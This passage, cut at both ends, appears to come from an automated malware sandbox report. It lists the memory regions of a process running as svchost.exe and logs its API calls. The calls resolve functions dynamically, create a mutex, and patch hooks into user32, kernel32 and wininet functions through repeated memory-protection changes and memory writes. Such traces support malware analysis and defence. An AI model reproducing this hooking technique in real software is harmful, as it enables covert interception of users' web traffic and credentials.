end_va = 0x6b6fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 377 start_va = 0x700000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 378 start_va = 0x64da0000 end_va = 0x64e12fff entry_point = 0x64db2f50 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" Region: id = 379 start_va = 0x64e20000 end_va = 0x64e6efff entry_point = 0x64e36ae0 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" Region: id = 380 start_va = 0x7f497000 end_va = 0x7f499fff entry_point = 0x0 region_type = private name = "private_0x000000007f497000" filename = "" Region: id = 381 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 382 start_va = 0x660000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 383 start_va = 0x6c0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 384 start_va = 0x800000 end_va = 0x8bdfff entry_point = 0x800000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 385 start_va = 0x4ae0000 end_va = 0x4ae3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 386 start_va = 0x4b00000 end_va = 0x4bfffff entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 387 start_va = 0x64e70000 end_va = 0x64e77fff entry_point = 0x64e71460 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" Region: id = 388 start_va = 0x74470000 end_va = 0x744c8fff entry_point = 0x744a8cc0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" Region: id = 389 start_va = 0x744d0000 end_va = 0x744d9fff entry_point = 0x744d2aa0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" Region: id = 390 start_va = 0x744e0000 end_va = 0x744fdfff entry_point = 0x744eb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" Region: id = 391 start_va = 0x75b70000 end_va = 0x75c1bfff entry_point = 0x75ba36b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" Region: id = 392 start_va = 0x76460000 end_va = 0x7654ffff entry_point = 0x764737d0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" Region: id = 393 start_va = 0x76e90000 end_va = 0x76ed2fff entry_point = 0x76e9f570 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" Region: id = 394 start_va = 0x76fa0000 end_va = 0x77115fff entry_point = 0x7703c9a0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" Region: id = 395 start_va = 0x7f370000 end_va = 0x7f46ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f370000" filename = "" Region: id = 396 start_va = 0x7f494000 end_va = 0x7f496fff entry_point = 0x0 region_type = private name = "private_0x000000007f494000" filename = "" Region: id = 397 start_va = 0x4a10000 end_va = 0x4a13fff entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 398 start_va = 0x4c00000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 399 start_va = 0x4e10000 end_va = 0x4e14fff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 400 start_va = 0x745a0000 end_va = 0x7465dfff entry_point = 0x745d5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" Region: id = 401 start_va = 0x76d70000 end_va = 0x76deafff entry_point = 0x76d8e3b0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" Region: id = 402 start_va = 0x4f00000 end_va = 0x501ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 403 start_va = 0x4f00000 end_va = 0x4ffffff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 404 start_va = 0x5000000 end_va = 0x5336fff entry_point = 0x5000000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 405 start_va = 0x74360000 end_va = 0x7438efff entry_point = 0x74379530 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" Region: id = 406 start_va = 0x74390000 end_va = 0x743aafff entry_point = 0x74399010 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" Region: id = 407 start_va = 0x743b0000 end_va = 0x743c2fff entry_point = 0x743b9500 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" Region: id = 408 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x4c0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\svchost.exe.mui" Region: id = 409 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 410 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 411 start_va = 0x5340000 end_va = 0x54c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005340000" filename = "" Region: id = 412 start_va = 0x54d0000 end_va = 0x5650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054d0000" filename = "" Region: id = 413 start_va = 0x5660000 end_va = 0x6a5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005660000" filename = "" Region: id = 414 start_va = 0x74660000 end_va = 0x747acfff entry_point = 0x747125d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" Region: id = 415 start_va = 0x75dd0000 end_va = 0x75f0ffff entry_point = 0x75de0280 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" Region: id = 416 start_va = 0x769c0000 end_va = 0x76adffff entry_point = 0x76a046e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" Region: id = 417 start_va = 0x76ae0000 end_va = 0x76b23fff entry_point = 0x76afd810 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" Region: id = 418 start_va = 0x77120000 end_va = 0x772d9fff entry_point = 0x771fcbb0 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" Region: id = 419 start_va = 0x77350000 end_va = 0x7737afff entry_point = 0x773552b0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" Region: id = 420 start_va = 0x75f10000 end_va = 0x75f15fff entry_point = 0x75f11480 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" Region: id = 421 start_va = 0x740f0000 end_va = 0x74313fff entry_point = 0x741d3100 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" Region: id = 422 start_va = 0x8c0000 end_va = 0x8c0fff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 423 start_va = 0x74350000 end_va = 0x74359fff entry_point = 0x74353200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" Region: id = 424 start_va = 0x74320000 end_va = 0x74347fff entry_point = 0x74327880 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" Thread: id = 8 os_tid = 0xc58 Thread: id = 9 os_tid = 0xc5c [0064.483] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76460000 [0064.483] GetProcAddress (hModule=0x76460000, lpProcName="InterlockedIncrement") returned 0x76477520 [0064.484] GetProcAddress (hModule=0x76460000, lpProcName="HeapFree") returned 0x764725e0 [0064.484] GetProcAddress (hModule=0x76460000, lpProcName="GetProcessHeap") returned 0x76477910 [0064.484] GetProcAddress (hModule=0x76460000, lpProcName="HeapDestroy") returned 0x7647d940 [0064.484] GetProcAddress (hModule=0x76460000, lpProcName="HeapCreate") returned 0x76479950 [0064.484] GetProcAddress (hModule=0x76460000, lpProcName="InterlockedExchange") returned 0x76477650 [0064.484] GetProcAddress (hModule=0x76460000, lpProcName="HeapAlloc") returned 0x7740da90 [0064.484] GetProcAddress (hModule=0x76460000, lpProcName="GetProcAddress") returned 0x76477940 [0064.484] GetProcAddress (hModule=0x76460000, lpProcName="LoadLibraryA") returned 0x7647d8d0 [0064.484] GetProcAddress (hModule=0x76460000, lpProcName="GetModuleHandleA") returned 0x76479640 [0064.485] GetProcAddress (hModule=0x76460000, lpProcName="GetLastError") returned 0x76472db0 [0064.485] GetProcAddress (hModule=0x76460000, lpProcName="InterlockedDecrement") returned 0x76477560 [0064.485] GetProcAddress (hModule=0x76460000, lpProcName="Sleep") returned 0x764777b0 [0064.485] GetProcAddress (hModule=0x76460000, lpProcName="HeapReAlloc") returned 0x7740bae0 [0064.485] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x773d0000 [0064.487] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0064.487] GetProcAddress (hModule=0x773d0000, lpProcName="RtlAddVectoredExceptionHandler") returned 0x7742f090 [0064.487] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x5bb507) returned 0x4b044d0 [0064.487] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x0 [0064.487] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76d70000 [0064.499] CryptAcquireContextW (in: phProv=0x5cfe94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfe94*=0x4b05680) returned 1 [0064.515] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0064.515] GetProcAddress (hModule=0x773d0000, lpProcName="RtlInitializeCriticalSection") returned 0x774295f0 [0064.516] GetModuleHandleA (lpModuleName="shlwapi.dll") returned 0x0 [0064.516] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x76ae0000 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="98") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="00") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="00") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="00") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="45") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="F7") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="50") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="B4") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="9C") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="5A") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="D7") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="AD") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="D3") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="C6") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="23") returned 2 [0064.582] wvnsprintfW (in: pszDest=0x65f3a8, cchDest=6, pszFmt="%02X", arglist=0x65f384 | out: pszDest="A5") returned 2 [0064.583] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x5ce8a8, dwRevision=0x1 | out: pSecurityDescriptor=0x5ce8a8) returned 1 [0064.583] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x5ce8a8, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x5ce8a8) returned 1 [0064.583] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0064.592] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4b14040, lpbSaclPresent=0x65ed44, pSacl=0x65ed3c, lpbSaclDefaulted=0x65ed40 | out: lpbSaclPresent=0x65ed44, pSacl=0x65ed3c, lpbSaclDefaulted=0x65ed40) returned 1 [0064.593] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5ce8a8, bSaclPresent=1, pSacl=0x4b14054, bSaclDefaulted=0 | out: pSecurityDescriptor=0x5ce8a8) returned 1 [0064.593] GetVersionExW (in: lpVersionInformation=0x65ec28*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x4b27942e, dwMinorVersion=0xfffffffe, dwBuildNumber=0x7748adc5, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x65ec28*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0064.593] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x65ed40 | out: TokenHandle=0x65ed40*=0x148) returned 1 [0064.593] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x65ed44 | out: TokenInformation=0x0, ReturnLength=0x65ed44) returned 0 [0064.593] GetLastError () returned 0x7a [0064.593] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0x19, TokenInformation=0x4c01020, TokenInformationLength=0x14, ReturnLength=0x65ed44 | out: TokenInformation=0x4c01020, ReturnLength=0x65ed44) returned 1 [0064.593] GetSidSubAuthorityCount (pSid=0x4c01028) returned 0x4c01029 [0064.593] GetSidSubAuthority (pSid=0x4c01028, nSubAuthority=0x0) returned 0x4c01030 [0064.593] CloseHandle (hObject=0x148) returned 1 [0064.593] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x65f5f4 | out: TokenHandle=0x65f5f4*=0x148) returned 1 [0064.594] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x65f5e0 | out: TokenInformation=0x0, ReturnLength=0x65f5e0) returned 0 [0064.594] GetLastError () returned 0x7a [0064.594] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0x1, TokenInformation=0x4c01020, TokenInformationLength=0x24, ReturnLength=0x65f5e0 | out: TokenInformation=0x4c01020, ReturnLength=0x65f5e0) returned 1 [0064.594] GetTokenInformation (in: TokenHandle=0x148, TokenInformationClass=0xc, TokenInformation=0x5ce83c, TokenInformationLength=0x4, ReturnLength=0x65f5f8 | out: TokenInformation=0x5ce83c, ReturnLength=0x65f5f8) returned 1 [0064.594] CloseHandle (hObject=0x148) returned 1 [0064.594] GetLengthSid (pSid=0x4c01028) returned 0x1c [0064.594] GetCurrentProcess () returned 0xffffffff [0064.594] GetModuleHandleA (lpModuleName="psapi.dll") returned 0x0 [0064.594] LoadLibraryA (lpLibFileName="psapi.dll") returned 0x75f10000 [0064.600] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x65f3f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\svchost.exe") returned 0x1f [0064.601] GetCurrentProcessId () returned 0xc54 [0064.601] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="A1") returned 2 [0064.601] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="00") returned 2 [0064.601] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="00") returned 2 [0064.601] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="00") returned 2 [0064.601] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="DA") returned 2 [0064.601] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="6A") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="F3") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="82") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="35") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="D3") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="5B") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="F5") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="70") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="C2") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="C4") returned 2 [0064.602] wvnsprintfW (in: pszDest=0x65f350, cchDest=6, pszFmt="%02X", arglist=0x65f32c | out: pszDest="E9") returned 2 [0064.602] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="A1000000DA6AF38235D35BF570C2C4E9") returned 0x148 [0064.603] GetLastError () returned 0x0 [0064.603] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75dd0000 [0064.604] GetModuleHandleA (lpModuleName="wininet.dll") returned 0x0 [0064.604] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x740f0000 [0064.615] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x276, flAllocationType=0x3000, flProtect=0x40) returned 0x8c0000 [0064.616] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x75deb9d0, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x75deb000, AllocationBase=0x75dd0000, AllocationProtect=0x80, RegionSize=0x7a000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.616] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75deb9d0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.616] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75deb9d0, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.617] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0000, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.617] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75deb9d0, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.623] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75deb9d0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.623] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x75e029b0, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x75e02000, AllocationBase=0x75dd0000, AllocationProtect=0x80, RegionSize=0x63000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.623] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75e029b0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75e029b0, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.623] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c000a, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.623] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75e029b0, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.624] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75e029b0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.624] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x76486330, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x76486000, AllocationBase=0x76460000, AllocationProtect=0x80, RegionSize=0x50000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.624] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x76486330, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.624] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76486330, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.624] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0014, lpBuffer=0x65f588*, nSize=0xb, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.624] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76486330, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.624] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x76486330, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.624] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x74164510, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x74164000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x165000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.625] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74164510, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.625] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74164510, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.625] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c001f, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.625] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74164510, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.625] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74164510, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.625] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7413d400, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x7413d000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x18c000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.625] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7413d400, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.625] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7413d400, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.625] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0029, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.626] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7413d400, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.626] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7413d400, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.626] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x741c5a50, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x741c5000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x104000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.626] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741c5a50, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.626] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741c5a50, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.626] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0033, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.626] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741c5a50, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.627] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741c5a50, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.627] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7413f5b0, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x7413f000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x18a000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.627] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7413f5b0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.627] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7413f5b0, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.627] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c003d, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.627] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7413f5b0, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.627] VirtualProtectEx (in: 